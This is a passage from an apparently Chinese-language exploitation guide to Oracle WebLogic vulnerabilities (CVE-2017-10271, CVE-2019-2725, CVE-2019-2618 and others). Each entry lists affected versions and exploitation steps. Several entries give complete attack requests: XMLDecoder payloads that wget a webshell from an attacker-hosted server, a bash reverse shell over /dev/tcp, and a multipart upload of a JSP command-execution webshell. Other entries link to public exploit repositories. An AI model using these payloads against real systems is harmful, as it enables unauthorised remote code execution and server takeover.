Weblogic反序列化漏洞 CVE-2019-2729
Weblogic任意文件读取漏洞（CVE-2019-2615)）
Weblogic 文件上传漏洞（CVE-2019-2618）<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="3-3-1、CVE-2019-2890（Weblogic反序列化漏洞-）"><a href="#3-3-1、CVE-2019-2890（Weblogic反序列化漏洞-）" class="headerlink" title="3.3.1、CVE-2019-2890（Weblogic反序列化漏洞 ）"></a>3.3.1、CVE-2019-2890（Weblogic反序列化漏洞 ）</h3><h4 id="（1）、介绍-8"><a href="#（1）、介绍-8" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        Weblogic在利用T3协议进行远程资源加载调用时，默认会进行黑名单过滤以保证反序列化安全。漏洞CVE-2019-2890绕过了Weblogic的反序列化黑名单，使攻击者可以通过T3协议对存在漏洞的Weblogic组件实施远程攻击，但该漏洞利用条件较高，官方也归类为需要身份认证。与CVE-2019-2725类似。</p>
<h4 id="（2）、影响版本-8"><a href="#（2）、影响版本-8" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0

12.1.3.0

12.2.1.3<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-8"><a href="#（3）、利用-8" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>exp</p>
<pre class="line-numbers language-none"><code class="language-none">https://github.com/SukaraLin/CVE-2019-2890<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>判断是否存在漏洞，如下图所示则可能存在漏洞</p>
<pre class="line-numbers language-none"><code class="language-none">http://ip:7001/_async/AsyncResponseService<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p> <img src="https://img.ex1t.xyz//CVE-2019-2729-1.png" alt="CVE-2019-2729-1"></p>
<p>开个web服务</p>
<p>放一个shell.jsp</p>
<p>通过以下请求包，上传到服务器</p>
<pre class="line-numbers language-none"><code class="language-none">POST /_async/AsyncResponseService HTTP/1.1
Host: you ip:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Length: 858
content-type: text/xml
 
&lt;soapenv:Envelope 
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"&gt;
&lt;soapenv:Header&gt;
&lt;wsa:Action&gt;xx&lt;/wsa:Action&gt;
&lt;wsa:RelatesTo&gt;xx&lt;/wsa:RelatesTo&gt;
&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
&lt;void class="java.lang.ProcessBuilder"&gt;
&lt;array class="java.lang.String" length="3"&gt;
&lt;void index="0"&gt;
&lt;string&gt;/bin/bash&lt;/string&gt;
&lt;/void&gt;
&lt;void index="1"&gt;
&lt;string&gt;-c&lt;/string&gt;
&lt;/void&gt;
&lt;void index="2"&gt;
&lt;string&gt;wget http://ip:端口/shell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp&lt;/string&gt;
&lt;/void&gt;
&lt;/array&gt;
&lt;void method="start"/&gt;&lt;/void&gt;
&lt;/work:WorkContext&gt;
&lt;/soapenv:Header&gt;
&lt;soapenv:Body&gt;
&lt;asy:onAsyncDelivery/&gt;
&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>文件地址</p>
<pre class="line-numbers language-none"><code class="language-none">http://ip:7001/_async/shell.jsp<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="3-3-2、CVE-2019-2729（Weblogic反序列化漏洞-）"><a href="#3-3-2、CVE-2019-2729（Weblogic反序列化漏洞-）" class="headerlink" title="3.3.2、CVE-2019-2729（Weblogic反序列化漏洞 ）"></a>3.3.2、CVE-2019-2729（Weblogic反序列化漏洞 ）</h3><h4 id="（1）、介绍-9"><a href="#（1）、介绍-9" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        是对CVE-2019-2725打的补丁被绕过了，使用标签<array method="forName">替换<class>标签。</class></array></p>
<h4 id="（2）、影响版本-9"><a href="#（2）、影响版本-9" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0.0
12.1.3.0.0
12.2.1.3.0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-9"><a href="#（3）、利用-9" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>exp</p>
<pre class="line-numbers language-none"><code class="language-none">https://github.com/ruthlezs/CVE-2019-2729-Exploit
python CVE-2019-2729.py -u 地址 -c whoami<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<h3 id="3-3-3、CVE-2019-2725-Weblogic反序列化远程代码执行漏洞"><a href="#3-3-3、CVE-2019-2725-Weblogic反序列化远程代码执行漏洞" class="headerlink" title="3.3.3、CVE-2019-2725(Weblogic反序列化远程代码执行漏洞)"></a>3.3.3、CVE-2019-2725(Weblogic反序列化远程代码执行漏洞)</h3><h4 id="（1）、介绍-10"><a href="#（1）、介绍-10" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞，这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞，通过针对Oracle官网历年来的补丁构造payload来绕过。与CVE-2019-2618类似。</p>
<h4 id="（2）、影响版本-10"><a href="#（2）、影响版本-10" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.*
12.1.3<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-10"><a href="#（3）、利用-10" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>漏洞存在的页面：</p>
<pre class="line-numbers language-none"><code class="language-none">/_async/AsyncResponseService<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>能访问就可能存在漏洞</p>
<p> <img src="https://img.ex1t.xyz//CVE-2020-14882-1.png" alt="CVE-2020-14882-1"></p>
<p>开个web服务放shell.txt，上传到服务器</p>
<pre class="line-numbers language-none"><code class="language-none">POST /_async/AsyncResponseService HTTP/1.1
Host: IP:PORT
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 859
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService"&gt;
&lt;soapenv:Header&gt;
&lt;wsa:Action&gt;xx&lt;/wsa:Action&gt;
&lt;wsa:RelatesTo&gt;xx&lt;/wsa:RelatesTo&gt;
&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
&lt;void class="java.lang.ProcessBuilder"&gt;
&lt;array class="java.lang.String" length="3"&gt;
&lt;void index="0"&gt;
&lt;string&gt;/bin/bash&lt;/string&gt;
&lt;/void&gt;
&lt;void index="1"&gt;
&lt;string&gt;-c&lt;/string&gt;
&lt;/void&gt;
&lt;void index="2"&gt;
&lt;string&gt;wget http://ip:端口/shell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp&lt;/string&gt;
&lt;/void&gt;
&lt;/array&gt;
&lt;void method="start"/&gt;&lt;/void&gt;
&lt;/work:WorkContext&gt;
&lt;/soapenv:Header&gt;
&lt;soapenv:Body&gt;
&lt;asy:onAsyncDelivery/&gt;
&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>位置</p>
<pre class="line-numbers language-none"><code class="language-none">ip:7001/bea_wls_deployment_internal/shell.jsp<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="3-3-4、CVE-2019-2618（Weblogic-文件上传漏洞）"><a href="#3-3-4、CVE-2019-2618（Weblogic-文件上传漏洞）" class="headerlink" title="3.3.4、CVE-2019-2618（Weblogic 文件上传漏洞）"></a>3.3.4、CVE-2019-2618（Weblogic 文件上传漏洞）</h3><h4 id="（1）、介绍-11"><a href="#（1）、介绍-11" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        主要是利用了WebLogic组件中的DeploymentService接口，该接口支持向服务器上传任意文件。攻击者突破了OAM（Oracle Access Management）认证，设置wl_request_type参数为app_upload，构造文件上传格式的POST请求包，上传jsp木马文件，进而可以获得整个服务器的权限。</p>
<h4 id="（2）、影响版本-11"><a href="#（2）、影响版本-11" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0
12.1.3.0
12.2.1.3<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-11"><a href="#（3）、利用-11" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p><strong>前提是要有账号密码</strong></p>
<p>上传成功后会返回文件地址</p>
<p>POST包</p>
<pre class="line-numbers language-none"><code class="language-none">POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
Host: ip:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
username: weblogic
wl_request_type: app_upload
cache-control: no-cache
wl_upload_application_name: ../tmp/_WL_internal/bea_wls_deployment_internal/gyuitk/war
serverName: weblogic
password: 12345.com
content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
archive: true
server_version: 10.3.6.0
wl_upload_delta: true
Content-Length: 1083
 
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="shell.jsp"; filename="shell.jsp"
Content-Type: false
 
 &lt;%@ page import="java.util.*,java.io.*"%&gt;
&lt;%
%&gt;
&lt;HTML&gt;&lt;BODY&gt;
Commands with JSP
&lt;FORM METHOD="GET" NAME="myform" ACTION=""&gt;
&lt;INPUT TYPE="text" NAME="cmd"&gt;
&lt;INPUT TYPE="submit" VALUE="Send"&gt;
&lt;/FORM&gt;
&lt;pre&gt;
&lt;%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "&lt;BR&gt;");
    Process p;
    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
    }
    else{
        p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    }
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
    out.println(disr);
    disr = dis.readLine();
    }
}
%&gt;
&lt;/pre&gt;
&lt;/BODY&gt;&lt;/HTML&gt; 
 
------WebKitFormBoundary7MA4YWxkTrZu0gW--<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>地址</p>
<pre class="line-numbers language-none"><code class="language-none">ip:7001/bea_wls_deployment_internal/shell.jsp<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h3 id="3-3-5、CVE-2019-2615（Weblogic任意文件读取漏洞"><a href="#3-3-5、CVE-2019-2615（Weblogic任意文件读取漏洞" class="headerlink" title="3.3.5、CVE-2019-2615（Weblogic任意文件读取漏洞)"></a>3.3.5、CVE-2019-2615（Weblogic任意文件读取漏洞)</h3><h4 id="（1）、介绍-12"><a href="#（1）、介绍-12" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        利用该漏洞，攻击者可以在已知用户名密码的情况下读取WebLogic服务器中的任意文件。</p>
<h4 id="（2）、影响版本-12"><a href="#（2）、影响版本-12" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0
12.1.3.0
12.2.1.3<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-12"><a href="#（3）、利用-12" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p> <img src="https://img.ex1t.xyz//CVE-2019-2615-1.png" alt="CVE-2019-2615-1"></p>
<h2 id="2-4、2018年"><a href="#2-4、2018年" class="headerlink" title="2.4、2018年"></a>2.4、2018年</h2><pre class="line-numbers language-none"><code class="language-none">weblogic 反序列化漏洞 CVE-2018-3252
Weblogic反序列化远程代码执行漏洞 CVE-2018-3245
Weblogic远程代码执行漏洞 CVE-2018-3191
Weblogic任意文件上传漏洞（CVE-2018-2894）
Weblogic WLS核心组件反序列化漏洞 CVE-2018-2893
Weblogic WLS Core Components 反序列化命令执行漏洞 CVE-2018-2628<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="2-4-1、CVE-2018-3252（weblogic-反序列化漏洞）"><a href="#2-4-1、CVE-2018-3252（weblogic-反序列化漏洞）" class="headerlink" title="2.4.1、CVE-2018-3252（weblogic 反序列化漏洞）"></a>2.4.1、CVE-2018-3252（weblogic 反序列化漏洞）</h3><h4 id="（1）、介绍-13"><a href="#（1）、介绍-13" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        weblogic DeploymentService组件的反序列化漏洞。</p>
<h4 id="（2）、影响版本-13"><a href="#（2）、影响版本-13" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">未找到<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="（3）、利用-13"><a href="#（3）、利用-13" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>POC</p>
<pre class="line-numbers language-none"><code class="language-none">https://github.com/pyn3rd/CVE-2018-3252<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="2-4-2、CVE-2018-3245（Weblogic反序列化远程代码执行漏洞-）"><a href="#2-4-2、CVE-2018-3245（Weblogic反序列化远程代码执行漏洞-）" class="headerlink" title="2.4.2、CVE-2018-3245（Weblogic反序列化远程代码执行漏洞 ）"></a>2.4.2、CVE-2018-3245（Weblogic反序列化远程代码执行漏洞 ）</h3><h4 id="（1）、介绍-14"><a href="#（1）、介绍-14" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        该漏洞通过 JRMP 协议利用 RMI 机制的缺陷达到执行任意反序列化代码的目的。攻击者可以在未授权的情况下将 payload 封装在 T3 协议中，通过对 T3 协议中的 payload 进行反序列化，从而实现对存在漏洞的 WebLogic 组件进行远程攻击，执行任意代码并可获取目标系统的所有权限。</p>
<h4 id="（2）、影响版本-14"><a href="#（2）、影响版本-14" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0
12.1.3.0
12.2.1.3<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-14"><a href="#（3）、利用-14" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>POC</p>
<pre class="line-numbers language-none"><code class="language-none">https://github.com/pyn3rd/CVE-2018-3245<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h3 id="2-4-3、CVE-2018-3191（Weblogic远程代码执行漏洞-）"><a href="#2-4-3、CVE-2018-3191（Weblogic远程代码执行漏洞-）" class="headerlink" title="2.4.3、CVE-2018-3191（Weblogic远程代码执行漏洞 ）"></a>2.4.3、CVE-2018-3191（Weblogic远程代码执行漏洞 ）</h3><h4 id="（1）、介绍-15"><a href="#（1）、介绍-15" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server，成功的漏洞利用可导致WebLogic Server被攻击者接管，从而造成远程代码执行。</p>
<h4 id="（2）、影响版本-15"><a href="#（2）、影响版本-15" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0
12.1.3.0
12.2.1.0
12.2.1.1<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-15"><a href="#（3）、利用-15" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>POC</p>
<pre class="line-numbers language-none"><code class="language-none">https://github.com/pyn3rd/CVE-2018-3191<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="2-4-4、CVE-2018-2894（Weblogic任意文件上传漏洞）"><a href="#2-4-4、CVE-2018-2894（Weblogic任意文件上传漏洞）" class="headerlink" title="2.4.4、CVE-2018-2894（Weblogic任意文件上传漏洞）"></a>2.4.4、CVE-2018-2894（Weblogic任意文件上传漏洞）</h3><h4 id="（1）、介绍-16"><a href="#（1）、介绍-16" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        WebLogic管理端未授权的两个页面存在任意上传getshell漏洞，可直接获取权限。两个页面分别为/ws_utc/begin.do，/ws_utc/config.do。</p>
<h4 id="（2）、影响版本-16"><a href="#（2）、影响版本-16" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0
12.1.3.0
12.2.1.2
12.2.1.3<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-16"><a href="#（3）、利用-16" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>首先要能够登录后台</p>
<p>/console访问后台登陆后</p>
<p>base_domain的高级配置中</p>
<p> <img src="https://img.ex1t.xyz//CVE-2018-2894-1.png" alt="CVE-2018-2894-1"></p>
<p>启用web服务测试页，记得在最下面保存。。。</p>
<p> <img src="https://img.ex1t.xyz//CVE-2018-2894-2.png" alt="CVE-2018-2894-2"></p>
<p>再访问</p>
<pre class="line-numbers language-none"><code class="language-none">http://XXX:7001/ws_utc/config.do<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p> <img src="https://img.ex1t.xyz//CVE-2018-2894-3.png" alt="CVE-2018-2894-3"></p>
<p>设置当前工作目录为</p>
<pre class="line-numbers language-none"><code class="language-none">/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>这个是ws_utc应用的静态文件css目录，访问这个是不需要权限的</p>
<p>然后安全添加jsp</p>
<p> <img src="https://img.ex1t.xyz//CVE-2018-2894-4.png" alt="CVE-2018-2894-4"></p>
<p>通过审查元素查看时间戳</p>
<p> <img src="https://img.ex1t.xyz//CVE-2018-2894-5.png" alt="CVE-2018-2894-5"></p>
<p>/ws_utc/css/config/keystore/[时间戳]_[文件名]</p>
<p>成功访问</p>
<pre class="line-numbers language-none"><code class="language-none">/ws_utc/css/config/keystore/1627709344373_ce.jsp<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p> <img src="https://img.ex1t.xyz//CVE-2018-2894-6.png" alt="CVE-2018-2894-6"></p>
<h3 id="2-4-5、CVE-2018-2893（Weblogic-WLS核心组件反序列化漏洞）"><a href="#2-4-5、CVE-2018-2893（Weblogic-WLS核心组件反序列化漏洞）" class="headerlink" title="2.4.5、CVE-2018-2893（Weblogic WLS核心组件反序列化漏洞）"></a>2.4.5、CVE-2018-2893（Weblogic WLS核心组件反序列化漏洞）</h3><h4 id="（1）、介绍-17"><a href="#（1）、介绍-17" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        此漏洞产生于WebLogic的T3服务，因此可通过控制T3协议的访问来临时阻断针对该漏洞的攻击。当开放WebLogic控制台端口（默认为7001端口）时，T3服务会默认开启。</p>
<h4 id="（2）、影响版本-17"><a href="#（2）、影响版本-17" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0
12.1.3.0
12.2.1.2
12.2.1.3<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-17"><a href="#（3）、利用-17" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><pre class="line-numbers language-none"><code class="language-none">https://github.com/ryanInf/CVE-2018-2893<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h3 id="2-4-6、CVE-2018-2628（Weblogic-WLS-Core-Components-反序列化命令执行漏洞）"><a href="#2-4-6、CVE-2018-2628（Weblogic-WLS-Core-Components-反序列化命令执行漏洞）" class="headerlink" title="2.4.6、CVE-2018-2628（Weblogic WLS Core Components 反序列化命令执行漏洞）"></a>2.4.6、CVE-2018-2628（Weblogic WLS Core Components 反序列化命令执行漏洞）</h3><h4 id="（1）、介绍-18"><a href="#（1）、介绍-18" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><h4 id="（2）、影响版本-18"><a href="#（2）、影响版本-18" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0
12.2.1.2
12.2.1.3
12.1.3.0
10.3.6.0
12.2.1.2
12.2.1.3
12.1.3.0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-18"><a href="#（3）、利用-18" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>POC</p>
<pre class="line-numbers language-none"><code class="language-none">https://github.com/shengqi158/CVE-2018-2628<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h2 id="2-5、其他年份"><a href="#2-5、其他年份" class="headerlink" title="2.5、其他年份"></a>2.5、其他年份</h2><pre class="line-numbers language-none"><code class="language-none">WebLogic XMLDecoder反序列化漏洞（CVE-2017-10271）
Weblogic 反序列化漏洞 CVE-2017-3506
Weblogic 反序列化漏洞 CVE-2017-3248
Weblogic SSRF漏洞 CVE-2014-4210<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="2-5-1、CVE-2017-10271（WebLogic-XMLDecoder反序列化漏洞）"><a href="#2-5-1、CVE-2017-10271（WebLogic-XMLDecoder反序列化漏洞）" class="headerlink" title="2.5.1、CVE-2017-10271（WebLogic XMLDecoder反序列化漏洞）"></a>2.5.1、CVE-2017-10271（WebLogic XMLDecoder反序列化漏洞）</h3><h4 id="（1）、介绍-19"><a href="#（1）、介绍-19" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        通过构建发送post请求，使用精心构造的xml数据造成任意代码执行</p>
<h4 id="（2）、影响版本-19"><a href="#（2）、影响版本-19" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0.0
12.1.3.0.0
12.2.1.1.0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-19"><a href="#（3）、利用-19" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>初步判断</p>
<pre class="line-numbers language-none"><code class="language-none">ip/wls-wsat/CoordinatorPortType11<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>存在下图则说明可能存在漏洞</p>
<p> <img src="https://img.ex1t.xyz//CVE-2017-10271-1.png" alt="CVE-2017-10271-1"></p>
<pre class="line-numbers language-none"><code class="language-none">写入文件，ip/wls-wsat/test.txt

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.8.148:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 756

&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"&gt;
      &lt;soapenv:Header&gt;
        &lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
         &lt;java version="1.6.0" class="java.beans.XMLDecoder"&gt;
                    &lt;object class="java.io.PrintWriter"&gt; 
                        &lt;string&gt;servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt&lt;/string&gt;&lt;void method="println"&gt;
                        &lt;string&gt;test(写入内容)&lt;/string&gt;&lt;/void&gt;&lt;void method="close"/&gt;
                    &lt;/object&gt;
            &lt;/java&gt;
        &lt;/work:WorkContext&gt;
      &lt;/soapenv:Header&gt;
      &lt;soapenv:Body/&gt;
&lt;/soapenv:Envelope&gt;

反弹shell（注意其中反弹shell的语句，需要进行编码，否则解析XML的时候将出现格式错误）：
&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"&gt; &lt;soapenv:Header&gt;
&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
&lt;java version="1.4.0" class="java.beans.XMLDecoder"&gt;
&lt;void class="java.lang.ProcessBuilder"&gt;
&lt;array class="java.lang.String" length="3"&gt;
&lt;void index="0"&gt;
&lt;string&gt;/bin/bash&lt;/string&gt;
&lt;/void&gt;
&lt;void index="1"&gt;
&lt;string&gt;-c&lt;/string&gt;
&lt;/void&gt;
&lt;void index="2"&gt;
&lt;string&gt;bash -i &gt;&amp; /dev/tcp/接收shell的ip/8888 0&gt;&amp;1&lt;/string&gt; 
&lt;/void&gt;
&lt;/array&gt;
&lt;void method="start"/&gt;&lt;/void&gt;
&lt;/java&gt;
&lt;/work:WorkContext&gt;
&lt;/soapenv:Header&gt;
&lt;soapenv:Body/&gt;
&lt;/soapenv:Envelope&gt;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="2-5-2、CVE-2017-3506（Weblogic-反序列化漏洞）"><a href="#2-5-2、CVE-2017-3506（Weblogic-反序列化漏洞）" class="headerlink" title="2.5.2、CVE-2017-3506（Weblogic 反序列化漏洞）"></a>2.5.2、CVE-2017-3506（Weblogic 反序列化漏洞）</h3><h4 id="（1）、介绍-20"><a href="#（1）、介绍-20" class="headerlink" title="（1）、介绍"></a>（1）、介绍</h4><p>​        一个XML的反序列化漏洞导致的命令执行。</p>
<h4 id="（2）、影响版本-20"><a href="#（2）、影响版本-20" class="headerlink" title="（2）、影响版本"></a>（2）、影响版本</h4><pre class="line-numbers language-none"><code class="language-none">10.3.6.0
12.1.3.0
12.2.1.0
12.2.1.1
12.2.1.2<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="（3）、利用-20"><a href="#（3）、利用-20" class="headerlink" title="（3）、利用"></a>（3）、利用</h4><p>详细讲解</p>
<pre class="line-numbers language-none"><code class="language-none">https://github.com/bit4woo/code2sec.com/blob/master/weblogic%E6%BC%8F%E6%B4%9ECVE-2017-3506%E5%A4%8D%E7%8E%B0%EF%BC%9AWeb%20Services%E6%A8%A1%E5%9D%97%E7%9A%84%E6%BC%8F%E6%B4%9E.md<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="2-5-3、CVE-2017-3248"><a href="#2-5-3、CVE-2017-3248" class="headerlink" title="2.5.3、CVE-2017-3248"></a>2.5.3、CVE-2017-3248</h3><p>（1）、介绍</p>
<p>参考文章</p>
<pre class="line-numbers language-none"><code class="language-none">https://blog.csdn.net/caiqiiqi/article/details/84246779<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>（2）、影响版本</p>
<pre class="line-numbers language-none"><code class="language-none">10.3.6.0，
12.1.3.0
12.2.1.0
12.2.1.1<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

